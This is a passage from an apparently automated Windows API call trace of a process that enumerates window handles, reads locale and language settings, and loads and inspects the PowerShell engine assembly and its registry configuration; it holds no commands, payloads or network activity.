lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x740 [0023.641] GetLastError () returned 0x514 [0023.641] GetWindowThreadProcessId (in: hWnd=0x10154, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x548 [0023.641] GetLastError () returned 0x514 [0023.642] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x46c [0023.642] GetLastError () returned 0x514 [0023.642] GetWindowThreadProcessId (in: hWnd=0x10148, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x464 [0023.642] GetLastError () returned 0x514 [0023.642] GetWindowThreadProcessId (in: hWnd=0x40138, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x77c [0023.642] GetLastError () returned 0x514 [0023.642] GetWindowThreadProcessId (in: hWnd=0x2013a, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x73c [0023.642] GetLastError () returned 0x514 [0023.642] GetWindowThreadProcessId (in: hWnd=0x50134, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x52c [0023.642] GetLastError () returned 0x514 [0023.642] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x54c [0023.642] GetLastError () returned 0x514 [0023.642] GetWindowThreadProcessId (in: hWnd=0x10122, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x630 [0023.642] GetLastError () returned 0x514 [0023.642] GetWindowThreadProcessId (in: hWnd=0x10120, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x5e0 [0023.642] GetLastError () returned 0x514 [0023.642] GetWindowThreadProcessId (in: hWnd=0x20116, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x630 [0023.643] GetLastError () returned 0x514 [0023.643] GetWindowThreadProcessId (in: hWnd=0x1010a, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x5e0 [0023.643] GetLastError () returned 0x514 [0023.643] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x630 [0023.643] GetLastError () returned 0x514 [0023.643] GetWindowThreadProcessId (in: hWnd=0x2001c, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x54c [0023.643] GetLastError () returned 0x514 [0023.643] GetWindowThreadProcessId (in: hWnd=0x200ae, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x54c [0023.643] GetLastError () returned 0x514 [0023.643] GetWindowThreadProcessId (in: hWnd=0x2009e, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x64c [0023.643] GetLastError () returned 0x514 [0023.643] GetWindowThreadProcessId (in: hWnd=0x2008c, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x64c [0023.643] GetLastError () returned 0x514 [0023.643] GetWindowThreadProcessId (in: hWnd=0x2008e, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x64c [0023.643] GetLastError () returned 0x514 [0023.643] GetWindowThreadProcessId (in: hWnd=0x20092, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x64c [0023.643] GetLastError () returned 0x514 [0023.644] GetWindowThreadProcessId (in: hWnd=0x2009a, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x64c [0023.644] GetLastError () returned 0x514 [0023.644] GetWindowThreadProcessId (in: hWnd=0x300a8, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x64c [0023.644] GetLastError () returned 0x514 [0023.644] GetWindowThreadProcessId (in: hWnd=0x20080, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x64c [0023.644] GetLastError () returned 0x514 [0023.644] GetWindowThreadProcessId (in: hWnd=0x100f6, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x228 [0023.644] GetLastError () returned 0x514 [0023.644] GetWindowThreadProcessId (in: hWnd=0x100f0, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x294 [0023.644] GetLastError () returned 0x514 [0023.644] GetWindowThreadProcessId (in: hWnd=0x100e8, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x7c4 [0023.644] GetLastError () returned 0x514 [0023.644] GetWindowThreadProcessId (in: hWnd=0x100dc, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x76c [0023.644] GetLastError () returned 0x514 [0023.644] GetWindowThreadProcessId (in: hWnd=0x100e2, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x61c [0023.644] GetLastError () returned 0x514 [0023.644] GetWindowThreadProcessId (in: hWnd=0x100da, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x764 [0023.645] GetLastError () returned 0x514 [0023.645] GetWindowThreadProcessId (in: hWnd=0x50076, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x64c [0023.645] GetLastError () returned 0x514 [0023.645] GetWindowThreadProcessId (in: hWnd=0x1006c, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x730 [0023.645] GetLastError () returned 0x514 [0023.645] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x64c [0023.645] GetLastError () returned 0x514 [0023.645] GetWindowThreadProcessId (in: hWnd=0x10062, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x64c [0023.645] GetLastError () returned 0x514 [0023.645] GetWindowThreadProcessId (in: hWnd=0x10050, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x64c [0023.645] GetLastError () returned 0x514 [0023.645] GetWindowThreadProcessId (in: hWnd=0x10100, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x404 [0023.645] GetLastError () returned 0x514 [0023.645] GetWindowThreadProcessId (in: hWnd=0x1004c, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x64c [0023.645] GetLastError () returned 0x514 [0023.645] GetWindowThreadProcessId (in: hWnd=0x10038, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x64c [0023.645] GetLastError () returned 0x514 [0023.646] GetWindowThreadProcessId (in: hWnd=0x10030, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x61c [0023.646] GetLastError () returned 0x514 [0023.646] GetWindowThreadProcessId (in: hWnd=0x2002c, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x61c [0023.646] GetLastError () returned 0x514 [0023.646] GetWindowThreadProcessId (in: hWnd=0x20026, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x5a4 [0023.646] GetLastError () returned 0x514 [0023.646] GetWindowThreadProcessId (in: hWnd=0x1002a, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x610 [0023.646] GetLastError () returned 0x514 [0023.646] GetWindowThreadProcessId (in: hWnd=0x100ec, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x148 [0023.646] GetLastError () returned 0x514 [0023.646] GetWindowThreadProcessId (in: hWnd=0x301ee, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0xa3c [0023.646] GetLastError () returned 0x514 [0023.646] GetWindowThreadProcessId (in: hWnd=0x100ca, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x61c [0023.646] GetLastError () returned 0x514 [0023.646] GetWindowThreadProcessId (in: hWnd=0x10112, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x4f8 [0023.646] GetLastError () returned 0x514 [0023.646] GetWindowThreadProcessId (in: hWnd=0x1003e, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x64c [0023.646] GetLastError () returned 0x514 [0023.646] GetWindowThreadProcessId (in: hWnd=0x1003a, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x64c [0023.646] GetLastError () returned 0x514 [0023.646] GetWindowThreadProcessId (in: hWnd=0x101da, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x990 [0023.646] GetLastError () returned 0x514 [0023.647] GetWindowThreadProcessId (in: hWnd=0x101a4, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x990 [0023.647] GetLastError () returned 0x514 [0023.647] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x8b8 [0023.647] GetLastError () returned 0x514 [0023.647] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x8a4 [0023.647] GetLastError () returned 0x514 [0023.647] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x890 [0023.647] GetLastError () returned 0x514 [0023.647] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x880 [0023.647] GetLastError () returned 0x514 [0023.647] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x870 [0023.647] GetLastError () returned 0x514 [0023.647] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x860 [0023.647] GetLastError () returned 0x514 [0023.647] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x850 [0023.647] GetLastError () returned 0x514 [0023.647] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x840 [0023.647] GetLastError () returned 0x514 [0023.647] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x830 [0023.647] GetLastError () returned 0x514 [0023.647] GetWindowThreadProcessId (in: hWnd=0x10164, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x820 [0023.647] GetLastError () returned 0x514 [0023.647] GetWindowThreadProcessId (in: hWnd=0x10160, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x810 [0023.647] GetLastError () returned 0x514 [0023.647] GetWindowThreadProcessId (in: hWnd=0x1015c, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x64 [0023.647] GetLastError () returned 0x514 [0023.648] GetWindowThreadProcessId (in: hWnd=0x10158, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x740 [0023.648] GetLastError () returned 0x514 [0023.648] GetWindowThreadProcessId (in: hWnd=0x10156, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x548 [0023.648] GetLastError () returned 0x514 [0023.648] GetWindowThreadProcessId (in: hWnd=0x10152, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x46c [0023.648] GetLastError () returned 0x514 [0023.648] GetWindowThreadProcessId (in: hWnd=0x1014c, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x464 [0023.648] GetLastError () returned 0x514 [0023.648] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x77c [0023.648] GetLastError () returned 0x514 [0023.648] GetWindowThreadProcessId (in: hWnd=0x10142, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x73c [0023.648] GetLastError () returned 0x514 [0023.648] GetWindowThreadProcessId (in: hWnd=0x20136, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x52c [0023.648] GetLastError () returned 0x514 [0023.648] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x5e0 [0023.648] GetLastError () returned 0x514 [0023.648] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x630 [0023.648] GetLastError () returned 0x514 [0023.648] GetWindowThreadProcessId (in: hWnd=0x20016, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x54c [0023.648] GetLastError () returned 0x514 [0023.648] GetWindowThreadProcessId (in: hWnd=0x100f8, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x228 [0023.648] GetLastError () returned 0x514 [0023.649] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x294 [0023.649] GetLastError () returned 0x514 [0023.649] GetWindowThreadProcessId (in: hWnd=0x100e6, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x61c [0023.649] GetLastError () returned 0x514 [0023.649] GetWindowThreadProcessId (in: hWnd=0x100e4, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x76c [0023.649] GetLastError () returned 0x514 [0023.649] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x404 [0023.649] GetLastError () returned 0x514 [0023.649] GetWindowThreadProcessId (in: hWnd=0x1002e, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x61c [0023.649] GetLastError () returned 0x514 [0023.649] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x5a4 [0023.649] GetLastError () returned 0x514 [0023.649] GetWindowThreadProcessId (in: hWnd=0x100ee, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0x148 [0023.649] GetLastError () returned 0x514 [0023.649] GetWindowThreadProcessId (in: hWnd=0x301f0, lpdwProcessId=0x1ce530 | out: lpdwProcessId=0x1ce530) returned 0xa4c [0023.649] GetLastError () returned 0x514 [0023.649] GetLastError () returned 0x514 [0023.651] WerSetFlags () returned 0x0 [0023.662] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1 [0023.664] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x1ce90c, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x1ce908 | out: pulNumLanguages=0x1ce90c, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x1ce908) returned 1 [0023.664] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x1ce90c, pwszLanguagesBuffer=0x1e0cfd8, pcchLanguagesBuffer=0x1ce908 | out: pulNumLanguages=0x1ce90c, pwszLanguagesBuffer=0x1e0cfd8, pcchLanguagesBuffer=0x1ce908) returned 1 [0023.671] GetUserDefaultLocaleName (in: lpLocaleName=0x2b64c0, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6 [0023.705] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0023.705] GetLastError () returned 0xcb [0023.710] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0023.710] GetLastError () returned 0xcb [0023.712] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0023.712] GetLastError () returned 0xcb [0023.723] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ce37c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0023.723] GetLastError () returned 0xcb [0023.723] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ce398, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0023.723] GetLastError () returned 0xcb [0023.723] SetErrorMode (uMode=0x1) returned 0x1 [0023.723] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x1ce818 | out: lpFileInformation=0x1ce818*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7f02680, ftCreationTime.dwHighDateTime=0x1d2f5d2, ftLastAccessTime.dwLowDateTime=0xb7f02680, ftLastAccessTime.dwHighDateTime=0x1d2f5d2, ftLastWriteTime.dwLowDateTime=0xba2e5500, ftLastWriteTime.dwHighDateTime=0x1cb889e, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1 [0023.723] GetLastError () returned 0xcb [0023.723] SetErrorMode (uMode=0x1) returned 0x1 [0023.723] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x1ce89c | out: lpdwHandle=0x1ce89c) returned 0x94c [0023.726] GetLastError () returned 0x0 [0023.726] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x1e0f508 | out: lpData=0x1e0f508) returned 1 [0023.728] VerQueryValueW (in: pBlock=0x1e0f508, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1ce868, puLen=0x1ce864 | out: lplpBuffer=0x1ce868*=0x1e0f5a4, puLen=0x1ce864) returned 1 [0023.728] VerQueryValueW (in: pBlock=0x1e0f508, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x1ce7e4, puLen=0x1ce7e0 | out: lplpBuffer=0x1ce7e4*=0x1e0f680, puLen=0x1ce7e0) returned 1 [0023.728] lstrlenW (lpString="Microsoft Corporation") returned 21 [0023.728] lstrcpyW (in: lpString1=0x2b64c0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation" [0023.728] VerQueryValueW (in: pBlock=0x1e0f508, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x1ce7e4, puLen=0x1ce7e0 | out: lplpBuffer=0x1ce7e4*=0x1e0f6d4, puLen=0x1ce7e0) returned 1 [0023.728] lstrlenW (lpString="System.Management.Automation") returned 28 [0023.728] lstrcpyW (in: lpString1=0x2b64c0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation" [0023.728] VerQueryValueW (in: pBlock=0x1e0f508, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x1ce7e4, puLen=0x1ce7e0 | out: lplpBuffer=0x1ce7e4*=0x1e0f730, puLen=0x1ce7e0) returned 1 [0023.728] lstrlenW (lpString="6.1.7601.17514") returned 14 [0023.728] lstrcpyW (in: lpString1=0x2b64c0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0023.728] VerQueryValueW (in: pBlock=0x1e0f508, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x1ce7e4, puLen=0x1ce7e0 | out: lplpBuffer=0x1ce7e4*=0x1e0f770, puLen=0x1ce7e0) returned 1 [0023.728] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0023.728] lstrcpyW (in: lpString1=0x2b64c0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0023.728] VerQueryValueW (in: pBlock=0x1e0f508, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x1ce7e4, puLen=0x1ce7e0 | out: lplpBuffer=0x1ce7e4*=0x1e0f7d8, puLen=0x1ce7e0) returned 1 [0023.728] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57 [0023.728] lstrcpyW (in: lpString1=0x2b64c0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved." [0023.729] VerQueryValueW (in: pBlock=0x1e0f508, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x1ce7e4, puLen=0x1ce7e0 | out: lplpBuffer=0x1ce7e4*=0x1e0f874, puLen=0x1ce7e0) returned 1 [0023.729] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0023.729] lstrcpyW (in: lpString1=0x2b64c0, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0023.729] VerQueryValueW (in: pBlock=0x1e0f508, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x1ce7e4, puLen=0x1ce7e0 | out: lplpBuffer=0x1ce7e4*=0x1e0f8d8, puLen=0x1ce7e0) returned 1 [0023.729] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42 [0023.729] lstrcpyW (in: lpString1=0x2b64c0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System" [0023.729] VerQueryValueW (in: pBlock=0x1e0f508, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x1ce7e4, puLen=0x1ce7e0 | out: lplpBuffer=0x1ce7e4*=0x1e0f954, puLen=0x1ce7e0) returned 1 [0023.729] lstrlenW (lpString="6.1.7601.17514") returned 14 [0023.729] lstrcpyW (in: lpString1=0x2b64c0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0023.729] VerQueryValueW (in: pBlock=0x1e0f508, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x1ce7e4, puLen=0x1ce7e0 | out: lplpBuffer=0x1ce7e4*=0x1e0f5fc, puLen=0x1ce7e0) returned 1 [0023.729] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49 [0023.729] lstrcpyW (in: lpString1=0x2b64c0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly" [0023.729] VerQueryValueW (in: pBlock=0x1e0f508, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x1ce7e4, puLen=0x1ce7e0 | out: lplpBuffer=0x1ce7e4*=0x0, puLen=0x1ce7e0) returned 0 [0023.729] VerQueryValueW (in: pBlock=0x1e0f508, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x1ce7e4, puLen=0x1ce7e0 | out: lplpBuffer=0x1ce7e4*=0x0, puLen=0x1ce7e0) returned 0 [0023.729] VerQueryValueW (in: pBlock=0x1e0f508, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x1ce7e4, puLen=0x1ce7e0 | out: lplpBuffer=0x1ce7e4*=0x0, puLen=0x1ce7e0) returned 0 [0023.729] VerQueryValueW (in: pBlock=0x1e0f508, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x1ce7d8, puLen=0x1ce7d4 | out: lplpBuffer=0x1ce7d8*=0x1e0f5a4, puLen=0x1ce7d4) returned 1 [0023.729] VerLanguageNameW (in: wLang=0x0, szLang=0x2b64c0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0023.729] VerQueryValueW (in: pBlock=0x1e0f508, lpSubBlock="\\", lplpBuffer=0x1ce7ec, puLen=0x1ce7e8 | out: lplpBuffer=0x1ce7ec*=0x1e0f530, puLen=0x1ce7e8) returned 1 [0023.736] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0023.736] GetLastError () returned 0xcb [0023.742] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0023.742] GetLastError () returned 0xcb [0023.746] lstrlenW (lpString="䅁") returned 1 [0023.750] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce7b0 | out: phkResult=0x1ce7b0*=0x2f8) returned 0x0 [0023.750] RegOpenKeyExW (in: hKey=0x2f8, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce7b4 | out: phkResult=0x1ce7b4*=0x2fc) returned 0x0 [0023.751] RegOpenKeyExW (in: hKey=0x2fc, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ce7e8 | out: phkResult=0x1ce7e8*=0x300) returned 0x0 [0023.752] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ce828, lpData=0x0, lpcbData=0x1ce824*=0x0 | out: lpType=0x1ce828*=0x1, lpData=0x0, lpcbData=0x1ce824*=0x56) returned 0x0 [0023.754] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ce828, lpData=0x2b64c0, lpcbData=0x1ce824*=0x56 | out: lpType=0x1ce828*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ce824*=0x56) returned 0x0 [0023.759] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ce330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0023.759] GetLastError () returned 0x0 [0023.761] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ce330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0023.761] GetLastError () returned 0x0 [0023.766] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ce330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0023.766] GetLastError () returned 0x0 [0023.780] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0023.780] GetLastError () returned 0xcb [0024.023] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1ce2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0024.023] GetLastError () returned 0x2 [0024.023] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1ce2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0024.023] GetLastError () returned 0x2 [0024.102] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2b64c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0024.102] GetLastError () returned 0xcb 